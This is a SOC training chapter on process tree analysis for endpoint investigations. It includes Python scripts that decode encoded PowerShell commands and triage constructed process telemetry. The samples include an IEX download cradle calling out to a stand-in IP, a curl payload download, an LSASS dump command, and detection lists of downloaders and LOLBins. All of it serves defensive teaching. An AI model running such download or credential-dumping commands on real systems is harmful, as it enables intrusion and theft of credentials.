Process tree analysis is the method of examining how processes start, interact, and spawn each other on an endpoint.
It is one of the most important skills in SOC and EDR investigations because most intrusions leave traces in the process lineage.
A malicious process typically has an unusual parent, carries abnormal command-line arguments, or spawns further processes to do its work.
This chapter covers process tree analysis at the depth a SOC analyst needs, showing how parent-child relationships expose malware, abuse of legitimate tools, exploitation, and lateral movement.
Why Process Trees Matter in SOC
A process tree shows:
- Which process executed first
- What child processes were created
- Whether the execution chain is normal or suspicious
- Which scripts, tools, or binaries were spawned
- Whether the attack is fileless
- How malware achieved persistence or C2
Most multi-stage attacks show up as a chain of processes, so the chain is where the evidence is.
The visibility needed to reconstruct it comes from EDR or Sysmon-style telemetry that records, for every process-creation event:
- process_name
- parent_process
- command_line
- integrity level
- file path
- network activity
- timestamps
Joined on process and parent IDs, these records reconstruct the attacker's behavior step by step.
Understanding Process Trees (SOC Breakdown)
A process tree begins with a parent process and captures all children it spawns.
Example of Legitimate Chain
explorer.exe → chrome.exe
Example of Suspicious Chain
WINWORD.exe → powershell.exe → curl.exe → payload.exe
The second chain strongly indicates malicious execution.
Key Elements Analysts Check
1. Parent Process
The process that initiated execution.
An abnormal parent is the strongest single signal in the tree, because legitimate software has predictable parents.
Examples:
- Office applications spawning PowerShell
- PDF readers spawning cmd.exe
- A browser spawning mshta.exe
- wscript.exe or cscript.exe launched from a user's Downloads or Temp directory
2. Child Processes
The processes spawned from a parent.
Malware often spawns:
- PowerShell
- cmd
- rundll32
- regsvr32
- mshta
- wscript/cscript
- python.exe
- bash
Any unexpected chain is a red flag.
3. Command-Line Arguments
The most revealing part of process tree analysis, because the arguments show what the process was told to do.
Suspicious indicators include:
- -enc (short for -EncodedCommand: base64-encoded PowerShell)
- -nop (short for -NoProfile)
- -w hidden (short for -WindowStyle Hidden)
- Invoke-Expression (or its alias IEX)
- Base64 strings
- Outbound URLs
- File downloads
- DLL loading
Example:
powershell.exe -nop -w hidden -enc JAB...
Note that powershell.exe accepts any unambiguous prefix of a parameter name, so -e, -ec, -enc and -EncodedCommand all mean the same thing; detection logic has to account for that rather than match one spelling.
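The following Python script is an added example, not part of the original chapter, that does the decoding and flag-matching described above on a constructed command line: it turns a -enc blob back into readable PowerShell (powershell.exe expects UTF-16LE text, base64-encoded), matches switches by their accepted prefixes rather than by exact spelling, and searches both the visible and the decoded text for the indicators listed. The sample payload, the 198.51.100.7 address and the indicator names are constructed for illustration.

```python
import base64
import re

# Constructed sample (not taken from a real incident). The payload is encoded
# the way powershell.exe expects -EncodedCommand input: UTF-16LE, then base64.
SAMPLE_PAYLOAD = ("IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://198.51.100.7/stage.ps1')")
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"

# powershell.exe accepts any unambiguous prefix of a parameter name, so each
# switch is described as (full name, shortest accepted prefix, extra aliases)
# instead of being matched literally. "-e"/"-ec" and "-ex"/"-ep" are the short
# forms most often seen in telemetry.
SWITCHES = {
    "no_profile":      ("noprofile", "nop", set()),
    "non_interactive": ("noninteractive", "noni", set()),
    "hidden_window":   ("windowstyle", "w", set()),
    "encoded_command": ("encodedcommand", "e", {"ec"}),
    "bypass_policy":   ("executionpolicy", "ex", {"ep"}),
}

# Indicators searched for in the visible command line AND in the decoded
# payload, so that -enc cannot hide them from the analyst.
CONTENT_PATTERNS = {
    "invoke_expression": r"\biex\b|invoke-expression",
    "download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    "url": r"https?://[^\s'\"]+",
    "nested_base64": r"frombase64string",
}


def _is_switch(token, full, shortest, aliases):
    name = token.lstrip("-/").lower()
    return name in aliases or (len(name) >= len(shortest) and full.startswith(name))


def decode_encoded_command(blob):
    """Decode a -EncodedCommand value; None if it is not base64 of UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze_powershell_cmdline(cmdline):
    """Return the decoded payload (if any) and the sorted list of indicators found."""
    tokens = cmdline.split()
    found, decoded = set(), None
    for i, tok in enumerate(tokens):
        if not tok.startswith(("-", "/")):
            continue
        value = tokens[i + 1].strip("\"'") if i + 1 < len(tokens) else ""
        for name, (full, shortest, aliases) in SWITCHES.items():
            if not _is_switch(tok, full, shortest, aliases):
                continue
            if name == "hidden_window" and not (value.lower().startswith("h") or value == "1"):
                continue  # a visible window style is not an indicator
            if name == "bypass_policy" and not value.lower().startswith(("bypass", "unrestricted")):
                continue
            if name == "encoded_command":
                decoded = decode_encoded_command(value)
                if decoded is None:
                    continue  # -e followed by something that is not base64: ignore
            found.add(name)
    haystack = (cmdline + " " + (decoded or "")).lower()
    found.update(name for name, pat in CONTENT_PATTERNS.items() if re.search(pat, haystack))
    return {"decoded": decoded, "indicators": sorted(found)}


if __name__ == "__main__":
    print(analyze_powershell_cmdline(SAMPLE_CMDLINE))
```

Run against the constructed sample, the decoded payload reads as the IEX download cradle and the indicator list names the hidden window, the missing profile, the encoded command, the download primitive and the URL; a plain `powershell.exe -NoProfile -File C:\scripts\backup.ps1` yields only no_profile, which on its own is not worth an alert.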
4. Execution Path
Malware rarely runs from protected locations such as C:\Windows\System32 or C:\Program Files, which require administrative rights to write to; it runs from directories an ordinary user can write to.
Suspicious paths include:
- C:\Users\Public\
- AppData\Roaming\
- %TEMP%
- %ProgramData%
- /tmp/
- /var/tmp/
5. Timing & Frequency
Attackers often trigger processes:
- Outside business hours
- Repeatedly every few minutes
- In sequence with other suspicious processes
6. Network Connections
Many child processes establish outbound connections.
Example:
powershell.exe → 91.22.113.10:443
Network activity attached to a process in the chain corroborates C2 behavior; combine it with the timing evidence above (repeated connections at a fixed interval) before treating it as confirmed.
SOC Process Tree Patterns
Below are the most common attack patterns found in real SOC investigations.
1. Office App → Script Engine → Downloader → Payload
Pattern:
WINWORD.exe → powershell.exe → curl/wget → payload.exe
Indicators:
- Encoded commands
- Hidden window
- Download from a suspicious domain
Associated with:
- Phishing-based malware
- Initial access malware loaders
2. Browser → mshta.exe → Script Execution
Pattern:
chrome.exe → mshta.exe → malicious.hta script
Used for:
- HTML-based phishing downloads
- Remote script loading
3. LOLBins (Living-Off-The-Land Binaries)
Attackers abuse signed, pre-installed Windows binaries so that malicious activity blends in with legitimate administration and passes allow-listing.
Common LOLBins:
- rundll32.exe
- regsvr32.exe
- wmic.exe
- mshta.exe
- powershell.exe
- bitsadmin.exe
Example:
rundll32.exe → loads attacker DLL from C:\Users\Public
For these binaries the name alone proves nothing; the command line and the path of the file they are asked to load decide whether the execution is legitimate.
4. Persistence Mechanism Chain
Pattern (creation and execution are two separate trees):
schtasks.exe /create ... (registers the task)
svchost.exe (Schedule service) → powershell.exe -File malicious.ps1 (at trigger time)
or
reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run ... (writes the Run key)
explorer.exe → payload.exe (at next logon)
Used for persistence creation. The process that writes the persistence entry is not the parent of the payload it launches later, so analysts correlate the two by task name, registry value, or file path rather than by lineage.
5. Credential Dumping Chain
Pattern:
attacker.exe → lsass.exe (memory access)
or
procdump.exe -ma lsass.exe
This is not a parent-child edge: lsass.exe is never spawned by the attacker. It appears in telemetry as a cross-process access event (a handle opened on lsass.exe with read rights, Sysmon Event ID 10), so the analyst pivots from the process tree to process-access events. Anything reading LSASS memory must be investigated.
6. Lateral Movement Process Trees
Examples:
- PsExec executions
- WinRM scripts
- WMI processes
Pattern:
wmiprvse.exe → cmd.exe → rundll32.exe
A shell under wmiprvse.exe (the WMI provider host) indicates code executed remotely through WMI; the equivalent tell-tale parents are PSEXESVC.exe for PsExec and wsmprovhost.exe for WinRM.
7. Fileless Malware Behavior
Pattern:
powershell.exe → in-memory loader → reflective DLL → no file drop
Here the tree is short, often a single powershell.exe with no file-backed children, so the evidence is in memory telemetry rather than lineage: image loads with no backing file on disk, remote thread creation, or the EDR's own injection events.
Performing Process Tree Analysis (SOC Workflow)
Analysts follow a step-by-step method.
Step 1 — Start at Alerted Process
Example:
Alert: powershell.exe -enc
Step 2 — Identify Parent Process
Check if parent is normal:
WINWORD.exe → suspicious
explorer.exe → baseline
Step 3 — Review Command Line
Look for:
- Base64
- Download commands
- Execution flags
- Suspicious file paths
Step 4 — Expand Child Processes
Example:
powershell.exe → payload.exe → miner.exe
This shows full attack path.
Step 5 — Check Network Activity
Look for:
- C2 domains
- Unusual ports
- Repeated beaconing
Step 6 — Map Behavior to MITRE ATT&CK
Example:
- T1059.001 (Command and Scripting Interpreter: PowerShell)
- T1021 (Remote Services; e.g. T1021.002 SMB/Windows Admin Shares, T1021.006 Windows Remote Management)
- T1105 (Ingress Tool Transfer)
Step 7 — Decide Severity
If tree shows malicious behavior → escalate to L2/L3.
Step 8 — Apply Containment
Examples:
- Kill processes
- Isolate host
- Block outbound domain
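The workflow above, steps 1 to 8, as an added Python example that is not part of the original chapter. It rebuilds the tree from a constructed set of process-creation and network events (the pids, paths, file names and the 203.0.113.9 address are invented for the example), walks from the alerted powershell.exe up to its parents and down to its children, applies the parent, path, downloader and network checks, maps the binaries seen to ATT&CK IDs, and derives a severity and a containment list. The severity thresholds and the ATT&CK mapping table are the example's own choices, not a standard.

```python
from collections import defaultdict

# Constructed process-creation telemetry (not from a real incident), using the
# field names the chapter lists. The -enc blob is truncated because this example
# inspects the tree, not the payload.
EVENTS = [
    {"pid": 4100, "ppid": 900, "process_name": "explorer.exe",
     "command_line": "explorer.exe", "file_path": r"C:\Windows\explorer.exe"},
    {"pid": 5120, "ppid": 4100, "process_name": "WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n C:\Users\alice\Downloads\invoice.docm',
     "file_path": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"pid": 5388, "ppid": 5120, "process_name": "powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc JABjAGwAaQBl...",
     "file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 5402, "ppid": 5388, "process_name": "curl.exe",
     "command_line": r"curl.exe -o C:\Users\Public\update.exe http://203.0.113.9/update.exe",
     "file_path": r"C:\Windows\System32\curl.exe"},
    {"pid": 5440, "ppid": 5388, "process_name": "update.exe",
     "command_line": r"C:\Users\Public\update.exe", "file_path": r"C:\Users\Public\update.exe"},
]
# Constructed network telemetry, joined to the tree by pid (Step 5).
NET_CONNECTIONS = [{"pid": 5440, "dst": "203.0.113.9", "dst_port": 443}]

DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Script engines and proxy-execution binaries with the ATT&CK sub-technique for each.
SCRIPT_ENGINES = {
    "powershell.exe": "T1059.001", "cmd.exe": "T1059.003",
    "wscript.exe": "T1059.005", "cscript.exe": "T1059.005",
    "mshta.exe": "T1218.005", "regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011",
}
DOWNLOADERS = {"curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\", "c:\\programdata\\", "\\temp\\", "/tmp/", "/var/tmp/")


def build_tree(events):
    """Index events by pid and by parent pid."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def lineage(pid, by_pid):
    """Step 2: walk parents upward; names are returned root-first."""
    names = []
    while pid in by_pid:
        names.append(by_pid[pid]["process_name"])
        pid = by_pid[pid]["ppid"]
    return names[::-1]


def descendants(pid, children):
    """Step 4: every pid below the alerted process, breadth-first."""
    out, queue = [], list(children.get(pid, []))
    while queue:
        p = queue.pop(0)
        out.append(p)
        queue.extend(children.get(p, []))
    return out


def triage(alert_pid, events, net_connections):
    """Steps 1-8 for one alerted pid: findings, ATT&CK IDs, severity, containment."""
    by_pid, children = build_tree(events)
    scope = [alert_pid] + descendants(alert_pid, children)
    findings, rules, attack, destinations = [], set(), set(), set()
    for pid in scope:
        e = by_pid[pid]
        name = e["process_name"].lower()
        parent = by_pid.get(e["ppid"])
        pname = parent["process_name"].lower() if parent else ""
        if name in SCRIPT_ENGINES:                    # Step 3: which engine ran
            attack.add(SCRIPT_ENGINES[name])
            if pname in DOCUMENT_APPS | BROWSERS:     # Step 2: abnormal parent
                rules.add("abnormal_parent")
                findings.append((pid, f"{pname} spawned {name}"))
        if name in DOWNLOADERS and "://" in e["command_line"]:
            rules.add("ingress_tool")
            attack.add("T1105")
            findings.append((pid, f"{name} fetched a remote file"))
        if any(marker in e["file_path"].lower() for marker in USER_WRITABLE):
            rules.add("user_writable_path")
            findings.append((pid, f"{name} runs from {e['file_path']}"))
    for c in net_connections:                         # Step 5: network joined by pid
        if c["pid"] in scope:
            rules.add("outbound_connection")
            destinations.add(c["dst"])
            findings.append((c["pid"], f"outbound to {c['dst']}:{c['dst_port']}"))
    # Step 7: an abnormal parent, or a user-writable binary talking out, is enough to escalate.
    if "abnormal_parent" in rules or {"user_writable_path", "outbound_connection"} <= rules:
        severity = "high"
    elif rules:
        severity = "medium"
    else:
        severity = "low"
    actions = []                                      # Step 8
    if severity == "high":
        actions = ["isolate host", f"kill process tree rooted at pid {alert_pid}"]
        actions += [f"block outbound to {d}" for d in sorted(destinations)]
    return {"lineage": lineage(alert_pid, by_pid), "findings": findings,
            "attack": sorted(attack), "severity": severity, "actions": actions}


if __name__ == "__main__":
    print(triage(5388, EVENTS, NET_CONNECTIONS))
```

Triage of the alerted powershell.exe (pid 5388) yields the lineage explorer.exe → WINWORD.EXE → powershell.exe, four findings (Office parent, curl fetching a remote file, update.exe running from C:\Users\Public, and its outbound connection), the IDs T1059.001 and T1105, and a high severity with isolate, kill and block actions. Triaging only the curl.exe child produces a medium severity and no containment, which is the point of expanding the tree in Step 4 instead of judging one process in isolation.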
Practical Process Tree Examples
Example 1 — Macro-Based Malware Infection
WINWORD.exe
↳ powershell.exe
↳ curl.exe
↳ dropper.exe
This is a classic phishing infection chain.
Example 2 — Crypto Miner
python.exe
↳ xmrig.exe
Suspicious because an interpreter launching a known mining binary is not a legitimate workload pattern; the tell is the child's name and path, not python.exe itself.
Example 3 — Cobalt Strike Beacon
rundll32.exe
↳ dllhost.exe
↳ powershell.exe
↳ http(s) beacon
Highly malicious.
Example 4 — Lateral Movement via PsExec
PSEXESVC.exe
↳ cmd.exe
↳ powershell.exe
PSEXESVC.exe is the service PsExec installs on the target; it runs under services.exe and spawns the requested command, so this tree indicates remote execution initiated from another host.
Intel Dump
- Process tree analysis reveals the full attacker execution chain.
- Analysts evaluate parent processes, child processes, command lines, paths, and network activity.
- Suspicious chains include Office → PowerShell, browser → mshta, and LOLBin-based sequences.
- Process trees help detect fileless malware, C2 beacons, persistence, and lateral movement.
- Investigation workflow: start at alert → validate parent → inspect children → analyze behavior → align to MITRE → escalate or respond.